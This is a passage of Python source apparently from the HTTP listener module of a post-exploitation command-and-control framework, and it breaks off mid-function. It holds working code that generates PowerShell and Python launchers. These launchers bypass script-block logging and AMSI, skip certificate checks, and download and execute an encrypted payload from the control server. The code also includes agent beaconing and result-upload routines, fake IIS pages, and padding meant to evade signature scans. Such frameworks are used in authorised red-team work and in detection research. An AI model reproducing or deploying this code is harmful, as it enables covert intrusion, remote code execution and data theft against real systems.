'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'Headers' : {
'Description' : 'Headers for the control server.',
'Required' : True,
'Value' : 'Server:Microsoft-IIS/7.5'
},
'Cookie' : {
'Description' : 'Custom Cookie Name',
'Required' : False,
'Value' : ''
},
'StagerURI' : {
'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
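# staging URIs come from the first (comma-separated) segment of the default communication profile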
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
# if no session cookie has been set yet, generate a random cookie name
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print helpers.color("[!] HTTPS selected but no CertPath specified.")
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
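# profile format: 'uri1,uri2,...|User-Agent|optional custom headers'; a random URI is picked for stage0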
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate a new cookie if the current session cookie is empty, so multiple listeners never end up with an empty cookie name
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPF")+"=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$val.Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$val}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.Ams'+'iUtils'"
stager += helpers.randomize_capitalization(');$Ref.GetField(')
stager += "'am'+'siInitFailed','NonPu'+'blic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+"=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;"
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket)
stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
#headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + self.session_cookie + """=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $"""+helpers.generate_random_script_var_name("wc")+""".UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETting taskings, then build the routing packet to stuff into a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color('[!] listeners/http generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a parameter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=')+1:]
